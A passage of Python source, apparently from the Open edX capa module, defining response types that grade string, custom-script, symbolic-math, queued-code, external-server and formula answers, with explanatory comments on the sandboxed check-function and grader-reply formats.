def compare_answer(self, ans1, ans2):
"""
Outside-facing function that lets us compare two numerical answers,
with this problem's tolerance.
"""
return compare_with_tolerance(
evaluator({}, {}, ans1),
evaluator({}, {}, ans2),
self.tolerance
)
def validate_answer(self, answer):
"""
Returns whether this answer is in a valid form.
"""
try:
evaluator(dict(), dict(), answer)
return True
except (StudentInputError, UndefinedVariable):
return False
def get_answers(self):
return {self.answer_id: self.correct_answer}
#-----------------------------------------------------------------------------
@registry.register
class StringResponse(LoncapaResponse):
"""
This response type allows one or more answers.
Additional answers are added with the `additional_answer` tag.
If `regexp` is in the `type` attribute, then answers and hints are treated as regular expressions.
Examples:
<stringresponse answer="Michigan">
<textline size="20" />
</stringresponse >
<stringresponse answer="a1" type="ci regexp">
<additional_answer>\d5</additional_answer>
<additional_answer>a3</additional_answer>
<textline size="20"/>
<hintgroup>
<stringhint answer="a0" type="ci" name="ha0" />
<stringhint answer="a4" type="ci" name="ha4" />
<stringhint answer="^\d" type="ci" name="re1" />
<hintpart on="ha0">
<startouttext />+1<endouttext />
</hintpart >
<hintpart on="ha4">
<startouttext />-1<endouttext />
</hintpart >
<hintpart on="re1">
<startouttext />Any number+5<endouttext />
</hintpart >
</hintgroup>
</stringresponse>
"""
human_name = _('Text Input')
tags = ['stringresponse']
hint_tag = 'stringhint'
allowed_inputfields = ['textline']
required_attributes = ['answer']
max_inputfields = 1
correct_answer = []
def setup_response_backward(self):
self.correct_answer = [
contextualize_text(answer, self.context).strip() for answer in self.xml.get('answer').split('_or_')
]
def setup_response(self):
self.backward = '_or_' in self.xml.get('answer').lower()
self.regexp = False
self.case_insensitive = False
if self.xml.get('type') is not None:
self.regexp = 'regexp' in self.xml.get('type').lower().split(' ')
self.case_insensitive = 'ci' in self.xml.get('type').lower().split(' ')
# backward compatibility; can be removed in the future, per @Lyla Fisher.
if self.backward:
self.setup_response_backward()
return
# end of backward compatibility
correct_answers = [self.xml.get('answer')] + [el.text for el in self.xml.findall('additional_answer')]
self.correct_answer = [contextualize_text(answer, self.context).strip() for answer in correct_answers]
# remove additional_answer from xml, otherwise they will be displayed
for el in self.xml.findall('additional_answer'):
self.xml.remove(el)
def get_score(self, student_answers):
"""Grade a string response """
student_answer = student_answers[self.answer_id].strip()
correct = self.check_string(self.correct_answer, student_answer)
return CorrectMap(self.answer_id, 'correct' if correct else 'incorrect')
def check_string_backward(self, expected, given):
if self.case_insensitive:
return given.lower() in [i.lower() for i in expected]
return given in expected
def check_string(self, expected, given):
"""
Find given in expected.
If self.regexp is true, regular expression search is used.
if self.case_insensitive is true, case insensitive search is used, otherwise case sensitive search is used.
Spaces around values of attributes are stripped in XML parsing step.
Args:
expected: list.
given: str.
Returns: bool
Raises: `ResponseError` if it fails to compile regular expression.
Note: for old code, which supports the _or_ separator, we add some backward compatibility handling.
Should be removed soon. When to remove it is up to Lyla Fisher.
"""
_ = self.capa_system.i18n.ugettext
# backward compatibility, should be removed in future.
if self.backward:
return self.check_string_backward(expected, given)
# end of backward compatibility
if self.regexp: # regexp match
flags = re.IGNORECASE if self.case_insensitive else 0
try:
# Wrap the alternatives in a non-capturing group so that the ^/$ anchors
# apply to the whole alternation rather than only its first/last branch.
regexp = re.compile('^(?:' + '|'.join(expected) + ')$', flags=flags | re.UNICODE)
result = re.search(regexp, given)
except Exception as err:
msg = u'[courseware.capa.responsetypes.stringresponse] {error}: {message}'.format(
error=_('error'),
message=err.message
)
log.error(msg, exc_info=True)
raise ResponseError(msg)
return bool(result)
else: # string match
if self.case_insensitive:
return given.lower() in [i.lower() for i in expected]
else:
return given in expected
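# Illustrative sketch of the regexp branch above (not original code). With
# expected=['a1', '\d5'] and case_insensitive=True, the compiled pattern is
#
#     ^(?:a1|\d5)$    with flags re.IGNORECASE | re.UNICODE
#
# so 'A1' and '25' match while 'a15' does not: the anchors force a
# whole-string match against one of the alternatives.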
def check_hint_condition(self, hxml_set, student_answers):
given = student_answers[self.answer_id].strip()
hints_to_show = []
for hxml in hxml_set:
name = hxml.get('name')
hinted_answer = contextualize_text(hxml.get('answer'), self.context).strip()
if self.check_string([hinted_answer], given):
hints_to_show.append(name)
log.debug('hints_to_show = %s', hints_to_show)
return hints_to_show
def get_answers(self):
_ = self.capa_system.i18n.ugettext
# Translators: Separator used in StringResponse to display multiple answers. Example: "Answer: Answer_1 or Answer_2 or Answer_3".
separator = u' <b>{}</b> '.format(_('or'))
return {self.answer_id: separator.join(self.correct_answer)}
#-----------------------------------------------------------------------------
@registry.register
class CustomResponse(LoncapaResponse):
"""
Custom response. The python code to be run should be in <answer>...</answer>
or in a <script>...</script>
"""
human_name = _('Custom Evaluated Script')
tags = ['customresponse']
allowed_inputfields = ['textline', 'textbox', 'crystallography',
'chemicalequationinput', 'vsepr_input',
'drag_and_drop_input', 'editamoleculeinput',
'designprotein2dinput', 'editageneinput',
'annotationinput', 'jsinput', 'formulaequationinput']
code = None
expect = None
def setup_response(self):
xml = self.xml
# if <customresponse> has an "expect" (or "answer") attribute then save
# that
self.expect = xml.get('expect') or xml.get('answer')
log.debug('answer_ids=%s', self.answer_ids)
# the <answer>...</answer> stanza should be local to the current <customresponse>.
# So try looking there first.
self.code = None
answer = None
try:
answer = xml.xpath('//*[@id=$id]//answer', id=xml.get('id'))[0]
except IndexError:
# print "xml = ",etree.tostring(xml,pretty_print=True)
# if we have a "cfn" attribute then look for the function specified by cfn, in
# the problem context ie the comparison function is defined in the
# <script>...</script> stanza instead
cfn = xml.get('cfn')
if cfn:
log.debug("cfn = %s", cfn)
# This is a bit twisty. We used to grab the cfn function from
# the context, but now that we sandbox Python execution, we
# can't get functions from previous executions. So we make an
# actual function that will re-execute the original script,
# and invoke the function with the data needed.
def make_check_function(script_code, cfn):
def check_function(expect, ans, **kwargs):
extra_args = "".join(", {0}={0}".format(k) for k in kwargs)
code = (
script_code + "\n" +
"cfn_return = %s(expect, ans%s)\n" % (cfn, extra_args)
)
globals_dict = {
'expect': expect,
'ans': ans,
}
globals_dict.update(kwargs)
safe_exec.safe_exec(
code,
globals_dict,
python_path=self.context['python_path'],
extra_files=self.context['extra_files'],
slug=self.id,
random_seed=self.context['seed'],
unsafely=self.capa_system.can_execute_unsafe_code(),
)
return globals_dict['cfn_return']
return check_function
self.code = make_check_function(self.context['script_code'], cfn)
if not self.code:
if answer is None:
log.error("[courseware.capa.responsetypes.customresponse] missing"
" code checking script! id=%s", self.id)
self.code = ''
else:
answer_src = answer.get('src')
if answer_src is not None:
# TODO: this code seems not to be used any more since self.capa_system.filesystem doesn't exist.
self.code = self.capa_system.filesystem.open('src/' + answer_src).read()
else:
self.code = answer.text
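# Sketch of the cfn mechanism above (illustrative, not original code). For
# <customresponse cfn="check" expect="42"> whose <script> defines `check`,
# the code string executed in the sandbox is roughly:
#
#     <original script code>
#     cfn_return = check(expect, ans)
#
# Names listed in cfn_extra_args are appended as keyword arguments, e.g.
# cfn_extra_args="seed" yields `cfn_return = check(expect, ans, seed=seed)`.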
def get_score(self, student_answers):
"""
student_answers is a dict with everything from request.POST, but with the first part
of each key removed (the string before the first "_").
"""
_ = self.capa_system.i18n.ugettext
log.debug('%s: student_answers=%s', unicode(self), student_answers)
# ordered list of answer ids
# sort the responses on the basis of the problem's position number,
# which is found in the last place in the problem id. Then convert
# this number into an int, so that we sort on ints instead of strings
idset = sorted(self.answer_ids, key=lambda x: int(x.split("_")[-1]))
try:
# ordered list of answers
submission = [student_answers[k] for k in idset]
except Exception as err:
msg = u"[courseware.capa.responsetypes.customresponse] {message}\n idset = {idset}, error = {err}".format(
message=_("error getting student answer from {student_answers}").format(student_answers=student_answers),
idset=idset,
err=err
)
log.error(
"[courseware.capa.responsetypes.customresponse] error getting"
" student answer from %s"
"\n idset = %s, error = %s",
student_answers, idset, err
)
raise Exception(msg)
# global variable in context which holds the Presentation MathML from dynamic math input
# ordered list of dynamath responses
dynamath = [student_answers.get(k + '_dynamath', None) for k in idset]
# if there is only one box, and it's empty, then don't evaluate
if len(idset) == 1 and not submission[0]:
# default to no error message on empty answer (to be consistent with other
# responsetypes) but allow author to still have the old behavior by setting
# empty_answer_err attribute
msg = (u'<span class="inline-error">{0}</span>'.format(_(u'No answer entered!'))
if self.xml.get('empty_answer_err') else '')
return CorrectMap(idset[0], 'incorrect', msg=msg)
# NOTE: correct = 'unknown' could be dangerous. Inputtypes such as textline are
# not expecting 'unknown's
correct = ['unknown'] * len(idset)
messages = [''] * len(idset)
overall_message = ""
# put these in the context of the check function evaluator
# note that this doesn't help the "cfn" version - only the exec version
self.context.update({
# my ID
'response_id': self.id,
# expected answer (if given as attribute)
'expect': self.expect,
# ordered list of student answers from entry boxes in our subtree
'submission': submission,
# ordered list of ID's of all entry boxes in our subtree
'idset': idset,
# ordered list of all javascript inputs in our subtree
'dynamath': dynamath,
# dict of student's responses, with keys being entry box IDs
'answers': student_answers,
# the list to be filled in by the check function
'correct': correct,
# the list of messages to be filled in by the check function
'messages': messages,
# a message that applies to the entire response
# instead of a particular input
'overall_message': overall_message,
# any options to be passed to the cfn
'options': self.xml.get('options'),
'testdat': 'hello world',
})
# Pass DEBUG to the check function.
self.context['debug'] = self.capa_system.DEBUG
# Run the check function
self.execute_check_function(idset, submission)
# build map giving "correct"ness of the answer(s)
correct = self.context['correct']
messages = self.context['messages']
overall_message = self.clean_message_html(self.context['overall_message'])
grade_decimals = self.context.get('grade_decimals')
correct_map = CorrectMap()
correct_map.set_overall_message(overall_message)
for k in range(len(idset)):
max_points = self.maxpoints[idset[k]]
if grade_decimals:
npoints = max_points * grade_decimals[k]
else:
npoints = max_points if correct[k] == 'correct' else 0
correct_map.set(idset[k], correct[k], msg=messages[k],
npoints=npoints)
return correct_map
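# Worked example of the scoring loop above (a sketch). With one input id
# whose maxpoints is 2, correct=['correct'] and grade_decimals=[0.5] yield
# npoints = 2 * 0.5 = 1.0; without grade_decimals the input earns the full
# 2 points when 'correct' and 0 otherwise.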
def execute_check_function(self, idset, submission):
# exec the check function
if isinstance(self.code, basestring):
try:
safe_exec.safe_exec(
self.code,
self.context,
cache=self.capa_system.cache,
python_path=self.context['python_path'],
extra_files=self.context['extra_files'],
slug=self.id,
random_seed=self.context['seed'],
unsafely=self.capa_system.can_execute_unsafe_code(),
)
except Exception as err:
self._handle_exec_exception(err)
else:
# self.code is not a string; it's a function we created earlier.
# this is an interface to the Tutor2 check functions
fn = self.code
answer_given = submission[0] if (len(idset) == 1) else submission
kwnames = self.xml.get("cfn_extra_args", "").split()
kwargs = {n: self.context.get(n) for n in kwnames}
log.debug(" submission = %s", submission)
try:
ret = fn(self.expect, answer_given, **kwargs)
except Exception as err: # pylint: disable=broad-except
self._handle_exec_exception(err)
log.debug(
"[courseware.capa.responsetypes.customresponse.get_score] ret = %s",
ret
)
if isinstance(ret, dict):
# One kind of dictionary the check function can return has the
# form {'ok': BOOLEAN, 'msg': STRING, 'grade_decimal' (optional): FLOAT (between 0.0 and 1.0)}
# 'ok' will control the checkmark, while grade_decimal, if present, will scale
# the score the student receives on the response.
# If there are multiple inputs, they all get marked
# to the same correct/incorrect value
if 'ok' in ret:
correct = ['correct' if ret['ok'] else 'incorrect'] * len(idset)
msg = ret.get('msg', None)
msg = self.clean_message_html(msg)
# If there is only one input, apply the message to that input
# Otherwise, apply the message to the whole problem
if len(idset) > 1:
self.context['overall_message'] = msg
else:
self.context['messages'][0] = msg
if 'grade_decimal' in ret:
decimal = ret['grade_decimal']
else:
decimal = 1.0 if ret['ok'] else 0.0
grade_decimals = [decimal] * len(idset)
self.context['grade_decimals'] = grade_decimals
# Another kind of dictionary the check function can return has
# the form:
# { 'overall_message': STRING,
# 'input_list': [
# { 'ok': BOOLEAN, 'msg': STRING, 'grade_decimal' (optional): FLOAT (between 0.0 and 1.0)},
# ...
# ]
# }
# 'ok' will control the checkmark, while grade_decimal, if present, will scale
# the score the student receives on the response.
#
# This allows the function to return an 'overall message'
# that applies to the entire problem, as well as correct/incorrect
# status, scaled grades, and messages for individual inputs
elif 'input_list' in ret:
overall_message = ret.get('overall_message', '')
input_list = ret['input_list']
correct = []
messages = []
grade_decimals = []
for input_dict in input_list:
correct.append('correct'
if input_dict['ok'] else 'incorrect')
msg = (self.clean_message_html(input_dict['msg'])
if 'msg' in input_dict else None)
messages.append(msg)
if 'grade_decimal' in input_dict:
decimal = input_dict['grade_decimal']
else:
decimal = 1.0 if input_dict['ok'] else 0.0
grade_decimals.append(decimal)
self.context['messages'] = messages
self.context['overall_message'] = overall_message
self.context['grade_decimals'] = grade_decimals
# Otherwise, we do not recognize the dictionary
# Raise an exception
else:
log.error(traceback.format_exc())
_ = self.capa_system.i18n.ugettext
raise ResponseError(
_("CustomResponse: check function returned an invalid dictionary!")
)
else:
correct = ['correct' if ret else 'incorrect'] * len(idset)
self.context['correct'] = correct
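# The two dictionary shapes accepted above, side by side (illustrative):
#
#     {'ok': True, 'msg': 'Good', 'grade_decimal': 0.8}
#
#     {'overall_message': 'Summary',
#      'input_list': [
#          {'ok': True,  'msg': 'Right', 'grade_decimal': 1.0},
#          {'ok': False, 'msg': 'Wrong'},  # grade_decimal defaults to 0.0
#      ]}
#
# Any non-dict return value is treated as a plain boolean and marks every
# input 'correct' or 'incorrect' with no message.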
def clean_message_html(self, msg):
# If *msg* is an empty string, then the code below
# will return "</html>". To avoid this, we first check
# that *msg* is a non-empty string.
if msg:
# When we parse *msg* using etree, there needs to be a root
# element, so we wrap the *msg* text in <html> tags
msg = '<html>' + msg + '</html>'
# Replace < characters
msg = msg.replace('&#60;', '&lt;')
# Use etree to prettify the HTML
msg = etree.tostring(fromstring_bs(msg, convertEntities=None),
pretty_print=True)
msg = msg.replace('&#13;', '')
# Remove the <html> tags we introduced earlier, so we're
# left with just the prettified message markup
msg = re.sub('(?ms)<html>(.*)</html>', '\\1', msg)
# Strip leading and trailing whitespace
return msg.strip()
# If we start with an empty string, then return an empty string
else:
return ""
def get_answers(self):
"""
Give correct answer expected for this response.
use default_answer_map from entry elements (eg textline),
when this response has multiple entry objects.
but for simplicity, if an "expect" attribute was given by the content author
ie <customresponse expect="foo" ...> then that.
"""
if len(self.answer_ids) > 1:
return self.default_answer_map
if self.expect:
return {self.answer_ids[0]: self.expect}
return self.default_answer_map
def _handle_exec_exception(self, err):
"""
Handle an exception raised during the execution of
custom Python code.
Raises a ResponseError
"""
# Log the error if we are debugging
msg = 'Error occurred while evaluating CustomResponse'
log.warning(msg, exc_info=True)
# Notify student with a student input error
_, _, traceback_obj = sys.exc_info()
raise ResponseError(err.message, traceback_obj)
#-----------------------------------------------------------------------------
@registry.register
class SymbolicResponse(CustomResponse):
"""
Symbolic math response checking, using symmath library.
"""
human_name = _('Symbolic Math Input')
tags = ['symbolicresponse']
max_inputfields = 1
def setup_response(self):
# Symbolic response always uses symmath_check()
# If the XML did not specify this, then set it now
# Otherwise, we get an error from the superclass
self.xml.set('cfn', 'symmath_check')
# Let CustomResponse do its setup
super(SymbolicResponse, self).setup_response()
def execute_check_function(self, idset, submission):
from symmath import symmath_check
try:
# Since we have limited max_inputfields to 1,
# we can assume that there is only one submission
answer_given = submission[0]
ret = symmath_check(
self.expect, answer_given,
dynamath=self.context.get('dynamath'),
options=self.context.get('options'),
debug=self.context.get('debug'),
)
except Exception as err:
log.error("oops in SymbolicResponse (cfn) error %s", err)
log.error(traceback.format_exc())
_ = self.capa_system.i18n.ugettext
# Translators: 'SymbolicResponse' is a problem type and should not be translated.
msg = _(u"An error occurred with SymbolicResponse. The error was: {error_msg}").format(
error_msg=err,
)
raise Exception(msg)
self.context['messages'][0] = self.clean_message_html(ret['msg'])
self.context['correct'] = ['correct' if ret['ok'] else 'incorrect'] * len(idset)
#-----------------------------------------------------------------------------
## ScoreMessage named tuple ##
## valid: Flag indicating valid score_msg format (Boolean)
## correct: Correctness of submission (Boolean)
## points: Points to be assigned (numeric, can be float)
## msg: Message from grader to display to student (string)
ScoreMessage = namedtuple('ScoreMessage', ['valid', 'correct', 'points', 'msg']) # pylint: disable=invalid-name
@registry.register
class CodeResponse(LoncapaResponse):
"""
Grade student code using an external queueing server, called 'xqueue'.
Expects 'xqueue' dict in LoncapaSystem with the following keys that are
needed by CodeResponse::
capa_system.xqueue = {
'interface': XQueueInterface object.
'construct_callback': Per-StudentModule callback URL constructor,
defaults to using 'score_update' as the correct dispatch (function).
'default_queuename': Default queue name to submit request (string).
}
External requests are only submitted for student submission grading, not
for getting reference answers.
"""
human_name = _('Code Input')
tags = ['coderesponse']
allowed_inputfields = ['textbox', 'filesubmission', 'matlabinput']
max_inputfields = 1
payload = None
initial_display = None
url = None
answer = None
queue_name = None
def setup_response(self):
"""
Configure CodeResponse from XML. Supports both CodeResponse and ExternalResponse XML.
TODO: Determine whether we are in synchronous or asynchronous (queued) mode.
"""
xml = self.xml
# TODO: XML can override external resource (grader/queue) URL
self.url = xml.get('url', None)
# We do not support xqueue within Studio.
if self.capa_system.xqueue is not None:
default_queuename = self.capa_system.xqueue['default_queuename']
else:
default_queuename = None
self.queue_name = xml.get('queuename', default_queuename)
# VS[compat]:
# Check if XML uses the ExternalResponse format or the generic
# CodeResponse format
codeparam = self.xml.find('codeparam')
assert codeparam is not None, "Unsupported old format! <coderesponse> without <codeparam>"
self._parse_coderesponse_xml(codeparam)
def _parse_coderesponse_xml(self, codeparam):
"""
Parse the new CodeResponse XML format. When successful, sets:
self.initial_display
self.answer (an answer to display to the student in the LMS)
self.payload
"""
grader_payload = codeparam.find('grader_payload')
grader_payload = grader_payload.text if grader_payload is not None else ''
self.payload = {
'grader_payload': grader_payload,
}
# matlab api key can be defined in course settings. if so, add it to the grader payload
api_key = getattr(self.capa_system, 'matlab_api_key', None)
if api_key and self.xml.find('matlabinput') is not None:
self.payload['token'] = api_key
self.payload['endpoint_version'] = "2"
self.payload['requestor_id'] = self.capa_system.anonymous_student_id
self.initial_display = find_with_default(
codeparam, 'initial_display', '')
_ = self.capa_system.i18n.ugettext
self.answer = find_with_default(codeparam, 'answer_display',
_(u'No answer provided.'))
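# Sketch of the XML this parser expects (illustrative values; the
# grader_payload text is opaque to the LMS and simply forwarded):
#
#     <coderesponse queuename="my-queue">
#       <textbox/>
#       <codeparam>
#         <initial_display>print "hello"</initial_display>
#         <answer_display>print "hello world"</answer_display>
#         <grader_payload>{"grader": "tests.py"}</grader_payload>
#       </codeparam>
#     </coderesponse>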
def get_score(self, student_answers):
_ = self.capa_system.i18n.ugettext
try:
# Note that submission can be a file
submission = student_answers[self.answer_id]
except Exception as err:
log.error(
'Error in CodeResponse %s: cannot get student answer for %s;'
' student_answers=%s',
err, self.answer_id, convert_files_to_filenames(student_answers)
)
raise Exception(err)
# We do not support xqueue within Studio.
if self.capa_system.xqueue is None:
cmap = CorrectMap()
cmap.set(self.answer_id, queuestate=None,
msg=_(u'Error: No grader has been set up for this problem.'))
return cmap
# Prepare xqueue request
#------------------------------------------------------------
qinterface = self.capa_system.xqueue['interface']
qtime = datetime.strftime(datetime.now(UTC), xqueue_interface.dateformat)
anonymous_student_id = self.capa_system.anonymous_student_id
# Generate header
queuekey = xqueue_interface.make_hashkey(
str(self.capa_system.seed) + qtime + anonymous_student_id + self.answer_id
)
callback_url = self.capa_system.xqueue['construct_callback']()
xheader = xqueue_interface.make_xheader(
lms_callback_url=callback_url,
lms_key=queuekey,
queue_name=self.queue_name
)
# Generate body
if is_list_of_files(submission):
# TODO: Get S3 pointer from the Queue
self.context.update({'submission': ''})
else:
self.context.update({'submission': submission})
contents = self.payload.copy()
# Metadata related to the student submission revealed to the external
# grader
student_info = {
'anonymous_student_id': anonymous_student_id,
'submission_time': qtime,
}
contents.update({'student_info': json.dumps(student_info)})
# Submit request. When successful, 'msg' is the prior length of the
# queue
if is_list_of_files(submission):
# TODO: Is there any information we want to send here?
contents.update({'student_response': ''})
(error, msg) = qinterface.send_to_queue(header=xheader,
body=json.dumps(contents),
files_to_upload=submission)
else:
contents.update({'student_response': submission})
(error, msg) = qinterface.send_to_queue(header=xheader,
body=json.dumps(contents))
# State associated with the queueing request
queuestate = {'key': queuekey,
'time': qtime, }
cmap = CorrectMap()
if error:
_ = self.capa_system.i18n.ugettext
error_msg = _('Unable to deliver your submission to grader (Reason: {error_msg}).'
' Please try again later.').format(error_msg=msg)
cmap.set(self.answer_id, queuestate=None, msg=error_msg)
else:
# Queueing mechanism flags:
# 1) Backend: Non-null CorrectMap['queuestate'] indicates that
# the problem has been queued
# 2) Frontend: correctness='incomplete' eventually trickles down
# through inputtypes.textbox and .filesubmission to inform the
# browser to poll the LMS
cmap.set(self.answer_id, queuestate=queuestate,
correctness='incomplete', msg=msg)
return cmap
def update_score(self, score_msg, oldcmap, queuekey):
"""Updates the user's score based on the returned message from the grader."""
(valid_score_msg, correct, points, msg) = self._parse_score_msg(score_msg)
_ = self.capa_system.i18n.ugettext
dog_stats_api.increment(xqueue_interface.XQUEUE_METRIC_NAME, tags=[
'action:update_score',
'correct:{}'.format(correct)
])
dog_stats_api.histogram(xqueue_interface.XQUEUE_METRIC_NAME + '.update_score.points_earned', points)
if not valid_score_msg:
# Translators: 'grader' refers to the edX automatic code grader.
error_msg = _('Invalid grader reply. Please contact the course staff.')
oldcmap.set(self.answer_id, msg=error_msg)
return oldcmap
correctness = 'correct' if correct else 'incorrect'
# TODO: Find out how this is used elsewhere, if any
self.context['correct'] = correctness
# Replace 'oldcmap' with new grading results if queuekey matches. If queuekey
# does not match, we keep waiting for the score_msg whose key actually
# matches
if oldcmap.is_right_queuekey(self.answer_id, queuekey):
# Sanity check on returned points
if points < 0:
points = 0
# Queuestate is consumed
oldcmap.set(
self.answer_id, npoints=points, correctness=correctness,
msg=msg.replace('&nbsp;', '&#160;'), queuestate=None)
else:
log.debug(
'CodeResponse: queuekey %s does not match for answer_id=%s.',
queuekey,
self.answer_id
)
return oldcmap
def get_answers(self):
anshtml = '<span class="code-answer"><pre><code>%s</code></pre></span>' % self.answer
return {self.answer_id: anshtml}
def get_initial_display(self):
"""
The course author can specify an initial display
to be shown in the code response box.
"""
return {self.answer_id: self.initial_display}
def _parse_score_msg(self, score_msg):
"""
Grader reply is a JSON-dump of the following dict
{ 'correct': True/False,
'score': Numeric value (floating point is okay) to assign to answer
'msg': grader_msg }
Returns (valid_score_msg, correct, score, msg):
valid_score_msg: Flag indicating valid score_msg format (Boolean)
correct: Correctness of submission (Boolean)
score: Points to be assigned (numeric, can be float)
msg: Message from grader to display to student (string)
"""
fail = (False, False, 0, '')
try:
score_result = json.loads(score_msg)
except (TypeError, ValueError):
log.error("External grader message should be a JSON-serialized dict."
" Received score_msg = %s", score_msg)
return fail
if not isinstance(score_result, dict):
log.error("External grader message should be a JSON-serialized dict."
" Received score_result = %s", score_result)
return fail
for tag in ['correct', 'score', 'msg']:
if tag not in score_result:
log.error("External grader message is missing one or more required"
" tags: 'correct', 'score', 'msg'")
return fail
# Next, we need to check that the contents of the external grader message are safe for the LMS.
# 1) Make sure that the message is valid XML (proper opening/closing tags)
# 2) If it is not valid XML, make sure it is valid HTML. Note: html5lib parser will try to repair any broken HTML
# For example: <aaa></bbb> will become <aaa/>.
msg = score_result['msg']
try:
etree.fromstring(msg)
except etree.XMLSyntaxError as _err:
# If `html` contains attrs with no values, like `controls` in <audio controls src='smth'/>,
# the XML parser will raise an exception, so we fall back to html5parser, which sets empty "" values for such attrs.
try:
parsed = html5lib.parseFragment(msg, treebuilder='lxml', namespaceHTMLElements=False)
except ValueError:
# the parsed message might contain strings that are not
# xml compatible, in which case, throw the error message
parsed = False
if not parsed:
log.error(
"Unable to parse external grader message as valid"
" XML: score_msg['msg']=%s",
msg,
)
return fail
return (True, score_result['correct'], score_result['score'], msg)
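# Illustrative round trip for the parser above:
#
#     score_msg = '{"correct": true, "score": 0.9, "msg": "<p>Well done</p>"}'
#     -> (True, True, 0.9, '<p>Well done</p>')
#
# A reply that is not a JSON dict, is missing one of the three keys, or
# carries markup that neither lxml nor html5lib can parse falls through to
# fail = (False, False, 0, '').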
#-----------------------------------------------------------------------------
@registry.register
class ExternalResponse(LoncapaResponse):
"""
Grade the students input using an external server.
Typically used by coding problems.
"""
human_name = _('External Grader')
tags = ['externalresponse']
allowed_inputfields = ['textline', 'textbox']
awdmap = {
'EXACT_ANS': 'correct', # TODO: handle other loncapa responses
'WRONG_FORMAT': 'incorrect',
}
def __init__(self, *args, **kwargs):
self.url = ''
self.tests = []
self.code = ''
super(ExternalResponse, self).__init__(*args, **kwargs)
def setup_response(self):
xml = self.xml
# FIXME - hardcoded URL
self.url = xml.get('url') or "http://qisx.mit.edu:8889/pyloncapa"
answer = xml.find('answer')
if answer is not None:
answer_src = answer.get('src')
if answer_src is not None:
# TODO: this code seems not to be used any more since self.capa_system.filesystem doesn't exist.
self.code = self.capa_system.filesystem.open('src/' + answer_src).read()
else:
self.code = answer.text
else:
# no <answer> stanza; get code from <script>
self.code = self.context['script_code']
if not self.code:
msg = '%s: Missing answer script code for externalresponse' % unicode(
self)
msg += "\nSee XML source line %s" % getattr(
self.xml, 'sourceline', '<unavailable>')
raise LoncapaProblemError(msg)
self.tests = xml.get('tests')
def do_external_request(self, cmd, extra_payload):
"""
Perform HTTP request / post to external server.
cmd = remote command to perform (str)
extra_payload = dict of extra stuff to post.
Return XML tree of response (from response body)
"""
xmlstr = etree.tostring(self.xml, pretty_print=True)
payload = {
'xml': xmlstr,
'edX_cmd': cmd,
'edX_tests': self.tests,
'processor': self.code,
}
payload.update(extra_payload)
try:
# call external server. TODO: synchronous call, can block for a
# long time
req = requests.post(self.url, data=payload)
except Exception as err:
msg = 'Error {0} - cannot connect to external server url={1}'.format(err, self.url)
log.error(msg)
raise Exception(msg)
if self.capa_system.DEBUG:
log.info('response = %s', req.text)
if (not req.text) or (not req.text.strip()):
raise Exception(
'Error: no response from external server url=%s' % self.url)
try:
# response is XML; parse it
rxml = etree.fromstring(req.text)
except Exception as err:
msg = 'Error {0} - cannot parse response from external server req.text={1}'.format(err, req.text)
log.error(msg)
raise Exception(msg)
return rxml
def get_score(self, student_answers):
idset = sorted(self.answer_ids)
cmap = CorrectMap()
try:
submission = [student_answers[k] for k in idset]
except Exception as err: # pylint: disable=broad-except
log.error(
'Error %s: cannot get student answer for %s; student_answers=%s',
err,
self.answer_ids,
student_answers
)
raise Exception(err)
self.context.update({'submission': submission})
extra_payload = {'edX_student_response': json.dumps(submission)}
try:
rxml = self.do_external_request('get_score', extra_payload)
except Exception as err: # pylint: disable=broad-except
log.error('Error %s', err)
if self.capa_system.DEBUG:
cmap.set_dict(dict(zip(sorted(
self.answer_ids), ['incorrect'] * len(idset))))
cmap.set_property(
self.answer_ids[0], 'msg',
'<span class="inline-error">%s</span>' % str(err).replace('<', '&lt;'))
return cmap
awd = rxml.find('awarddetail').text
self.context['correct'] = ['correct']
if awd in self.awdmap:
self.context['correct'][0] = self.awdmap[awd]
# create CorrectMap
for key in idset:
idx = idset.index(key)
msg = rxml.find('message').text.replace(
'&nbsp;', '&#160;') if idx == 0 else None
cmap.set(key, self.context['correct'][idx], msg=msg)
return cmap
def get_answers(self):
"""
Use external server to get expected answers
"""
try:
rxml = self.do_external_request('get_answers', {})
exans = json.loads(rxml.find('expected').text)
except Exception as err: # pylint: disable=broad-except
log.error('Error %s', err)
if self.capa_system.DEBUG:
msg = '<span class="inline-error">%s</span>' % str(
err).replace('<', '&lt;')
exans = [''] * len(self.answer_ids)
exans[0] = msg
if not (len(exans) == len(self.answer_ids)):
log.error('Expected %s answers from external server, only got %s!',
len(self.answer_ids), len(exans))
raise Exception('Short response from external server')
return dict(zip(self.answer_ids, exans))
#-----------------------------------------------------------------------------
@registry.register
class FormulaResponse(LoncapaResponse):
"""
Checking of symbolic math response using numerical sampling.
"""
human_name = _('Math Expression Input')
tags = ['formularesponse']
hint_tag = 'formulahint'
allowed_inputfields = ['textline', 'formulaequationinput']
required_attributes = ['answer', 'samples']
max_inputfields = 1
def __init__(self, *args, **kwargs):
self.correct_answer = ''
self.samples = ''
self.tolerance = default_tolerance
self.case_sensitive = False
super(FormulaResponse, self).__init__(*args, **kwargs)
def setup_response(self):
xml = self.xml
context = self.context
self.correct_answer = contextualize_text(xml.get('answer'), context)
self.samples = contextualize_text(xml.get('samples'), context)
# Find the tolerance
tolerance_xml = xml.xpath(
'//*[@id=$id]//responseparam[@type="tolerance"]/@default',
id=xml.get('id')
)
if tolerance_xml: # If it isn't an empty list...
self.tolerance = contextualize_text(tolerance_xml[0], context)
types = xml.get('type')
if types is None:
typeslist = []
else:
typeslist = types.split(',')
if 'ci' in typeslist:
# Case insensitive
self.case_sensitive = False
elif 'cs' in typeslist:
# Case sensitive
self.case_sensitive = True
else:
# Default
self.case_sensitive = False
def get_score(self, student_answers):
given = student_answers[self.answer_id]
correctness = self.check_formula(
self.correct_answer,
given,
self.samples
)
return CorrectMap(self.answer_id, correctness)
def tupleize_answers(self, answer, var_dict_list):
"""
Takes in an answer and a list of dictionaries mapping variables to values.
Each dictionary represents a test case for the answer.
Returns a tuple of formula evaluation results.
"""
_ = self.capa_system.i18n.ugettext
out = []
for var_dict in var_dict_list:
try:
out.append(evaluator(
var_dict,
dict(),
answer,
case_sensitive=self.case_sensitive,
))
except UndefinedVariable as err:
log.debug(
'formularesponse: undefined variable in formula=%s',
cgi.escape(answer)
)
raise StudentInputError(
_("Invalid input: {bad_input} not permitted in answer.").format(bad_input=err.message)
)
except ValueError as err:
if 'factorial' in err.message:
# This is thrown when fact() or factorial() is used in a formularesponse answer
# that tests on negative and/or non-integer inputs
# err.message will be: `factorial() only accepts integral values` or
# `factorial() not defined for negative values`
log.debug(
('formularesponse: factorial function used in response '
'that tests negative and/or non-integer inputs. '
'Provided answer was: %s'),
cgi.escape(answer)
)
raise StudentInputError(
